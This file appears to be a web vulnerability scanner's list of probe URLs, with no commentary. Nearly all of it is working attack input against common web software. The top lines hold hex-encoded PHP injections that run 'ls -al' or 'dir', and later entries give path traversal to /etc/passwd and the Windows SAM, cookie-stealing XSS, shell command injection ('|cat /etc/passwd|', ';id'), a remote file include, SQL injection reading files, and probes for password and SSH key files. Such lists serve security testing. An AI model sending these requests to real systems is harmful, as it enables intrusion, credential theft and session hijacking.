/forum/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/postnuke/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/modules/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/phpBB/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/forum/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/modules/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/forum/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/My_eGallery/public/displayCategory.php
/postnuke/My_eGallery/public/displayCategory.php
/postnuke/html/My_eGallery/public/displayCategory.php
/modules/My_eGallery/public/displayCategory.php
/phpBB/My_eGallery/public/displayCategory.php
/forum/My_eGallery/public/displayCategory.php
/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/postnuke/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/postnuke/html/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/modules/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/phpBB/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/forum/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/postnuke/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/postnuke/html/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/modules/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/phpBB/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/forum/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/_layouts/alllibs.htm
/_layouts/settings.htm
/_layouts/userinfo.htm
/_pages
/_vti_bin/fpcount.exe/
/?mod=&op=browse
/?mod=node&nid=some_thing&op=view
/?mod=some_thing&op=browse
/?pattern=/etc/*&sort=name
/?sql_debug=1
/................../etc/passwd
/.../.../.../.../.../.../.../.../.../.../etc/passwd
/.../.../.../.../.../.../.../.../.../boot.ini
/../../../../../../../../../../etc/passwd
/../config.dat
/../webserver.ini
/..\\..\\..\\..\\..\\..\\temp\\temp.class
/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam
/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam
/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
/.%252e/.%252e/.%252e/winnt/boot.ini
/.access
/.addressbook
/.bash_history
/.bashrc
/.cobalt/sysManage/../admin/.htaccess
/.forward
/.history
/.htaccess
/.htpasswd
/.lynx_cookies
/.mysql_history
/.passwd
/.pinerc
/.plan
/.proclog
/.procmailrc
/.profile
/.rhosts
/.sh_history
/.ssh
/.ssh/authorized_keys
/.ssh/known_hosts
/[SecCheck]/..%252f..%252f../ext.ini
/[SecCheck]/..%255c..%255c../ext.ini
/[SecCheck]/..%2f../ext.ini
////./../.../boot.ini
///etc/hosts
///etc/passwd
//admin/admin.shtml
//admin/aindex.htm
//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>
//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>
/<script>alert('Vulnerable');</script>
/%00
/%00/
/%0a%0a.jsp
/%22%3cscript%3ealert(%22xss%22)%3c/script%3e
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
/%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
/%3f.jsp
/%3f.jsp
/%3f.jsp
/%3f.jsp
/.aspx
/.jsp
/.shtml
/.thtml
/~/.asp
/~/.aspx?aspxerrorpath=null
/~/.aspx
/~root/
/a_security.htm
/a?
/a.jsp/
/a/
/a%5c.aspx
/acart2_0/acart2_0.mdb
/acart2_0/admin/category.asp
/acart2_0/admin/error.asp?msg=
/acart2_0/admin/index.asp?msg=
/acart2_0/deliver.asp?msg=
/acart2_0/error.asp?msg=
/acart2_0/signin.asp?msg=
/accounts/getuserdesc.asp
/achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
/active.log
/add_user.php
/add.php
/add.php3?url=ja&adurl=javascript:
/addressbook.php?\\\">
/modules/Submit/index.php?op=pre&title=
/mp3/
/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
/msadm/domain/index.php3?account_name=\\\">
/msadm/site/index.php3?authid=\\\">
/msadm/user/login.php3?account_name=\\\">
/musicqueue.cgi
/myhome.php?action=messages&box=
/myinvoicer/config.inc
/mylog.phtml?screen=/etc/passwd
/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
/nav/cList.php?root=
/netutils/findata.stm?user=
/netutils/ipdata.stm?ipaddr=
/netutils/whodata.stm?sitename=
/news/news.mdb
/newuser?Image=../../database/rbsserv.mdb
/node/view/666\\\">
/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
/nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
/oekaki/
/officescan/hotdownload/ofscan.ini
/ojspdemos/basic/hellouser/hellouser.jsp
/ojspdemos/basic/simple/usebean.jsp
/ojspdemos/basic/simple/welcomeuser.jsp
/openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
/openautoclassifieds/friendmail.php?listing=
/opendir.php?/etc/passwd
/opendir.php?requesturl=/etc/passwd
/oprocmgr-status
/options.php?optpage=
/order/order_log_v12.dat
/order/order_log.dat
/orders/order_log_v12.dat
/Orders/order_log_v12.dat
/orders/order_log.dat
/Orders/order_log.dat
/ows-bin/perlidlc.bat?&dir
/ows/restricted%2eshow
/pafiledb/includes/team/file.php
/page.cgi?../../../../../../../../../../etc/passwd
/Page/1,10966,,00.html?var=
/pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
/passwdfile
/password.inc
/path/nw/article.php?id='
/path/nw/article.php?id='
/pccsmysqladm/incs/dbconnect.inc
/PDG_Cart/oder.log
/PDG_Cart/shopper.conf
/people.lst
/perl/-e%20%22system('cat%20/etc/passwd');\\%22
/perl/
/pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
/phorum/admin/footer.php?GLOBALS[message]=
/phorum/admin/header.php?GLOBALS[message]=
/phorum/admin/stats.php
/photo_album/
/photo/
/photo/manage.cgi
/photodata/
/photodata/manage.cgi
/php-coolfile/action.php?action=edit&file=config.php
/php-coolfile/action.php?action=edit&file=config.php
/php.ini
/php/index.php
/php/mlog.phtml
/php/mylog.phtml?screen=/etc/passwd
/php/php.exe?c:\\winnt\\boot.ini
/phpBB/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/phpBB/phpinfo.php
/phpBB/viewtopic.php?t=17071&highlight=\\\">\\\"
/phpBB/viewtopic.php?topic_id=
/phpBB2/includes/db.php
/phpBB2/search.php?search_id=1\\\",
/phpclassifieds/latestwap.php?url=
/phpEventCalendar/file_upload.php
/phpimageview.php?pic=javascript:alert('Vulnerable')
/phpinfo.php?VARIABLE=
/phpinfo.php
/phpinfo.php3?VARIABLE=
/phpinfo.php3
/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
/phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
/phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
/phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\\",
/phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
/phprocketaddin/?page=../../../../../../../../../../boot.ini
/phprocketaddin/?page=../../../../../../../../../../etc/passwd
/phpshare/phpshare.php
/phptonuke.php?filnavn=/etc/passwd
/phptonuke.php?filnavn=
/phpwebchat/register.php?register=yes&username=OverG&email=&email1=
/phpwebfilemgr/index.php?f=../../../../../../../../../etc
/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
/phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\\\">
/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
/phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\\\">
/phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\\\">&MMN_position=[X:X]
/phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\\\">
/pls/help/
/pls/portal30/admin_/
/pls/sample/admin_/help/..%255cplsql.conf
/pls/simpledad/admin_/
/pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
/pls/simpledad/admin_/dadentries.htm
/pls/simpledad/admin_/gateway.htm?schema=sample
/pls/simpledad/admin_/globalsettings.htm
/pm_buddy_list.asp?name=A&desc=B%22%3E%3Ca%20s=%22&code=1
/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
/pmlite.php
/pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
/porn/
/postnuke/html/index.php?module=My_eGallery
/postnuke/html/modules.php?op=modload&name=News&file=article&sid=
/postnuke/index.php?module=My_eGallery
/postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=MocosoftUtilities\\\"%3
/powerportal/
/pp.php?action=login
/pr0n/
/profile.php?u=xxxxxxxx
/profiles.php?uid=<script>alert(document.cookie)</script>
/Program%20Files/
/project/index.php?m=projects&user_cookie=1
/pron/
/pub/english.cgi?op=rmail
/put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
/pvote/ch_info.php?newpass=password&confirm=password%20
/pw/storemgr.pw
/pwd.db
/quikstore.cfg
/quikstore.cgi
/readme.txt
/README.TXT
/readme
/replymsg.php?send=1&destin=
/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
/rtm.log
/samples/search.dll?query=
/samples/search.dll?query=
/sca/menu.jsp
/scozbook/view.php?PG=whatever
/script>alert('Vulnerable').cfm
/scripts
/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
/scripts/wsisa.dll/WService=anything?WSMadmin
/scripts/wsisa.dll/WService=anything?WSMadmin
/search.asp?term=<%00script>alert('Vulnerable')
/search.php?mailbox=INBOX&what=x&where=&submit=Search
/search.php?searchfor=\\\">
/search.php?searchstring=
/search.php?sess=your_session_id&lookfor=<script>alert(document.cookie)</script>
/search.php?zoom_query=
/Search
/search/?SectionIDOverride=1&SearchText=
/search/
/search/index.cfm?
/search97cgi/s97_cgi?action=FilterSearch&filter=;
/search97cgi/s97_cgi
/securecontrolpanel/
/securelogin/1,2345,A,00.html
/server/
/servlet/allaire.jrun.ssi.SSIFilter
/servlet/allaire.jrun.ssi.SSIFilter
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
/servlet/com.unify.servletexec.UploadServlet
/servlet/ContentServer?pagename=
/servlet/ContentServer?pagename=
/servlet/Counter
/servlet/Counter
/servlet/DateServlet
/servlet/FingerServlet
/servlet/HelloWorldServlet
/servlet/IsItWorking
/servlet/SchedulerTransfer
/servlet/SessionManager
/servlet/SessionServlet
/servlet/SimpleServlet
/servlet/SnoopServlet
/servlet/sunexamples.BBoardServlet
/servlets/SchedulerTransfer
/session/admnlogin
/SetSecurity.shm
/settings/site.ini
/setup.exe?&page=list_users&user=P
/sgdynamo.exe?HTNAME=
/shop/database/metacart.mdb
/shop/member_html.cgi?file=;cat%20/etc/passwd|
/shop/member_html.cgi?file=|cat%20/etc/passwd|
/shop/normal_html.cgi?file=;cat%20/etc/passwd|
/shop/normal_html.cgi?file=../../../../../../etc/issue%00
/shop/normal_html.cgi?file=<script>alert(\\\"Vulnerable\\\")</script>
/shop/normal_html.cgi?file=|cat%20/etc/passwd|
/shopa_sessionlist.asp
/shopadmin.asp
/shopdbtest.asp
/shopdisplayproducts.asp?id=1&cat=
/shoponline/fpdb/shop.mdb
/shopping/database/metacart.mdb
/shopping/diag_dbtest.asp
/shopping/shopdisplayproducts.asp?id=1&cat=
/shopping300.mdb
/shopping400.mdb
/shoppingdirectory/midicart.mdb
/shoutbox.php?conf=../../../../../../../etc/passwd
/showcat.php?catid=<Script>JavaScript:alert('Vulnerable');</Script>
/SilverStream
/SilverStream/Meta/Tables/?access-mode=text
/simplebbs/users/users.php
/sips/sipssys/users/a/admin/user
/site/'UNIONALLSELECTFileToClob('/etc/passwd','server')::html,0FROMsysusersWHEREusername=USER--/.html
/site/'UNIONALLSELECTFileToClob('/etc/passwd','server')::html,0FROMsysusersWHEREusername=USER--/.html
/siteminder
/siteminder/smadmin.html
/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
/SiteScope/htdocs/SiteScope.html
/smssend.php
/soapdocs/ReleaseNotes.html
/soinfo.php?\\\">
/SPHERA/login/sm_login_screen.php?error=\\\">
/SPHERA/login/sm_login_screen.php?uid=\\\">
/splashAdmin.php
/spwd
/sqldump.sql
/sqlnet.log
/src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
/ss000007.pl?PRODREF=
/ssdefs/
/ssdefs/siteseed.dtd
/sshome/
/start.php?config=alper.inc.php
/structure.sql
/style/
/styles/
/submit?setoption=q&option=allowed_ips&value=255.255.255.255
/submit.php?subject=&story=&storyext=&op=Preview
/sunshop.index.php?action=storenew&username=
/SUNWmc/htdocs/en_US/
/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
/support/messages
/supporter/index.php?t=ticketfiles&id=<script></script>
/supporter/index.php?t=tickettime&id=<script></script>
/supporter/index.php?t=updateticketlog&id=<script></script>
/syshelp/cscript/showfnc.stm?pkg=
/syshelp/cscript/showfncs.stm?pkg=
/syshelp/cscript/showfunc.stm?func=
/syshelp/stmex.stm?foo=
/syshelp/stmex.stm?foo=
/syshelp/stmex.stm?foo=123&bar=
/sysuser/docmgr/create.stm?path=
/sysuser/docmgr/edit.stm?name=
/sysuser/docmgr/edit.stm?path=
/sysuser/docmgr/ftp.stm?path=
/sysuser/docmgr/htaccess.stm?path=
/sysuser/docmgr/iecreate.stm?path=
/sysuser/docmgr/iecreate.stm?template=../
/sysuser/docmgr/ieedit.stm?name=
/sysuser/docmgr/ieedit.stm?path=
/sysuser/docmgr/ieedit.stm?url=../
/sysuser/docmgr/info.stm?name=
/sysuser/docmgr/info.stm?path=
/sysuser/docmgr/mkdir.stm?path=
/sysuser/docmgr/rename.stm?name=
/sysuser/docmgr/rename.stm?path=
/sysuser/docmgr/search.stm?path=
/sysuser/docmgr/search.stm?query=
/sysuser/docmgr/sendmail.stm?name=
/sysuser/docmgr/sendmail.stm?path=
/sysuser/docmgr/template.stm?path=
/sysuser/docmgr/update.stm?name=
/sysuser/docmgr/update.stm?path=
/sysuser/docmgr/vccheckin.stm?name=
/sysuser/docmgr/vccheckin.stm?path=
/sysuser/docmgr/vccreate.stm?name=
/sysuser/docmgr/vccreate.stm?path=
/sysuser/docmgr/vchist.stm?name=
/sysuser/docmgr/vchist.stm?path=
/tcb/files/auth/r/root
/templates/form_header.php?noticemsg=
/templates/form_header.php?noticemsg=
/test.php
/test/info.php
/test/phpinfo.php
/texis.exe/?-dump
/texis.exe/?-version
/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
/theme1/selector?button=status,monitor,session\\\">&button_url=/system/status/status,/system/status/moniter,/system/status/session
/theme1/selector?button=status,monitor,session\\\">&button_url=/system/status/status,/system/status/moniter,/system/status/session
/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\\\">,/system/status/session
/theme1/selector?button=status,monitor,session&button_url=/system/status/status\\\">,/system/status/moniter,/system/status/session
/themes/mambosimple.php?detection=detected&sitename=
/ticket.php?id=99999
/tiki/
/tiki/tiki-install.php
/TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script>
/tsweb/
/typo3conf/
/typo3conf/database.sql
/typo3conf/localconf.php
/upload.php?type=\\\"
/upload.php?type=\\\"
/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\\boot.ini
/usage/
/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
/user.php?op=userinfo&uname=
/usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
/userinfo.php?uid=1;
/userlog.php
/users.php?mode=profile&uid=<script>alert(document.cookie)</script>
/vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
/vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
/vchat/msg.txt
/vgn/ac/data
/vgn/ac/delete
/vgn/ac/edit
/vgn/ac/esave
/vgn/ac/fsave
/vgn/ac/index
/vgn/asp/MetaDataUpdate
/vgn/asp/previewer
/vgn/asp/status
/vgn/asp/style
/vgn/errors
/vgn/jsp/controller
/vgn/jsp/errorpage
/vgn/jsp/initialize
/vgn/jsp/jspstatus
/vgn/jsp/jspstatus56
/vgn/jsp/metadataupdate
/vgn/jsp/previewer
/vgn/jsp/style
/vgn/legacy/edit
/vgn/legacy/save
/vgn/license
/vgn/login
/vgn/login/1,501,,00.html?cookieName=x--\\>
/vgn/performance/TMT
/vgn/performance/TMT/Report
/vgn/performance/TMT/Report/XML
/vgn/performance/TMT/reset
/vgn/ppstats
/vgn/previewer
/vgn/record/previewer
/vgn/style
/vgn/stylepreviewer
/vgn/vr/Deleting
/vgn/vr/Editing
/vgn/vr/Saving
/vgn/vr/Select
/vider.php3
/view_source.jsp
/viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
/viewpage.php?file=/etc/passwd
/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/w-agora/
/warez/
/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
/web-console/ServerInfo.jsp%00
/WEB-INF./web.xml
/WEB-INF/web.xml
/web/
/webalizer/
/webamil/test.php?mode=phpinfo
/webamil/test.php
/webcalendar/colors.php?color=
/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
/webcalendar/week.php?eventinfo=
/webcalendar/week.php?user=\\\">
/webcart-lite/config/import.txt
/webcart-lite/orders/import.txt
/webcart/carts/
/webcart/config/
/webcart/config/clients.txt
/webcart/orders/
/webcart/orders/import.txt
/webchat/register.php?register=yes&username=OverG&email=&email1=
/webmail/
/webmail/blank.html
/webmail/horde/test.php
/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
/webMathematica/MSP?MSPStoreID=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini&MSPStoreType=image/gif
/webtools/bonsai/ccvsblame.cgi?file=/index.html&root=
/webtools/bonsai/cvsblame.cgi?file=
/webtools/bonsai/cvslog.cgi?file=*&rev=&root=
/webtools/bonsai/cvslog.cgi?file=
/webtools/bonsai/cvsquery.cgi?branch=&file=&date=
/webtools/bonsai/cvsquery.cgi?module=&branch=&dir=&file=&who=&sortby=Date&hours=2&date=week
/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=&branch=HEAD
/webtools/bonsai/showcheckins.cgi?person=
/whateverxxxx.html
/wikihome/action/conflict.php
/ws_ftp.ini
/WS_FTP.ini
/wwwboard/passwd.txt
/wwwping/index.stm?wwwsite=
/wx/s.dll?d=/boot.ini
/Xcelerate/LoginPage.html
/xdk/
/xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
/xsql/demo/airport/airport.xsql?xml-stylesheet=none
/z_user_show.php?method=showuserlink&class=&rollid=admin&x=3da59a9da8825&
/zorum/index.php?method=<script>alert('Vulnerable')</script>
/.psql_history
/acceso/
/access-log
/access.log
/access/
/access_log
/acciones/
/account/
/accounting/
/activex/
/adm/
/admin.htm
/admin.html
/admin.php
/admin.php3
/admin.shtml
/admin/
/Administration/
/administration/
/administrator/
/Admin_files/
/advwebadmin/
/Agent/
/Agentes/
/agentes/
/Agents/
/analog/
/apache/
/app/
/applicattion/
/applicattions/
/apps/
/archivar/
/archive/
/archives/
/archivo/
/Asp/
/asp/
/atc/
/auth/
/awebvisit.stat
/ayuda/
/backdoor/
/backup/
/bak/
/banca/
/banco/
/bank/
/bbv/
/bdata/
/bdatos/
/beta/
/bin/
/boot/
/buy/
/buynow/
/c/
/cache-stats/
/caja/
/card/
/cards/
/cart/
/cash/
/ccard/
/ccbill/secure/ccbill.log
/cd/
/cdrom/
/cert/
/certificado/
/certificate
/certificates
/cfdocs/exampleapp/email/application.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/application.cfm
/cfdocs/examples/httpclient/mainframeset.cfm
/cgi-bin/dbmlparser.exe
/cgi-bin/icat
/client/
/cliente/
/clientes/
/clients/
/cm/
/code/
/communicator/
/compra/
/compras/
/compressed/
/conecta/
/config/
/config/checks.txt
/connect/
/console
/correo/
/counter/
/credit/
/crypto/
/css
/cuenta/
/cuentas/
/customers/
/dan_o.dat
/dat/
/data/
/dato/
/datos/
/db/
/dbase/
/demo/
/demos/
/dev/
/devel/
/development/
/dir/
/directory/
/DMR/
/doc-html/
/down/
/download/
/downloads/
/easylog/easylog.html
/ejemplo/
/ejemplos/
/employees/
/envia/
/enviamail/
/error_log
/es/
/Excel/
/excel/
/EXE/
/exe/
/fbsd/
/file/
/fileadmin/
/files/
/forum/
/forums/
/foto/
/fotos/
/fpadmin/
/ftp/
/gfx/
/global/
/graphics/
/guest/
/guestbook/
/guests/
/hidden/
/hitmatic/
/hitmatic/analyse.cgi
/hits.txt
/hit_tracker/
/home/
/homepage/
/htdocs/
/html/
/HyperStat/stat_what.log
/hyperstat/stat_what.log
/ibill/
/idea/
/ideas/
/imagenes/
/img/
/imgs/
/import/
/impreso/
/includes/
/incoming/
/info/
/informacion/
/information/
/ingresa/
/ingreso/
/install/
/internal/
/intranet/
/invitado/
/invitados/
/java/
/jdbc/
/job/
/jrun/
/js
/lib/
/library/
/libro/
/linux/
/log.htm
/log.htm
/log.html
/log.txt
/logfile
/logfile.htm
/logfile.html
/logfile.txt
/logfile/
/logfiles/
/logger.html
/logger/
/logging/
/login/
/logs.txt
/logs/
/logs/access_log
/logs/error_log
/lost+found/
/mail/
/manage/cgi/cgiproc
/marketing/
/mbox
/members/
/message/
/messaging/
/ministats/admin.cgi
/misc/
/mkstats/
/movimientos/
/mqseries/
/msql/
/MSword/
/Msword/
/msword/
/NetDynamic/
/NetDynamics/
/netscape/
/new
/new/
/news
/nl/
/noticias/
/odbc/
/officescan/cgi/jdkRqNotify.exe
/old/
/oracle
/oradata/
/order/
/orders/
/orders/checks.txt
/orders/mountain.cfg
/orders/orders.log
/orders/orders.txt
/outgoing/
/ows/
/Pages/
/pages/
/passwd
/passwd.adjunct
/passwd.txt
/password
/password/
/passwords.txt
/passwords/
/PDG_Cart/
/perl5/
/php/
/phpmyadmin/
/phpMyAdmin/
/pics/
/piranha/secure/passwd.php3
/pix/
/poll
/polls
/privado/
/private/
/prod/
/prueba/
/pruebas/
/pub/
/public/
/publica/
/publicar/
/publico/
/purchase/
/purchases/
/pw/
/python/
/register/
/registered/
/reports/
/reseller/
/restricted/
/retail/
/reviews/newpro.cgi
/root/
/sales/
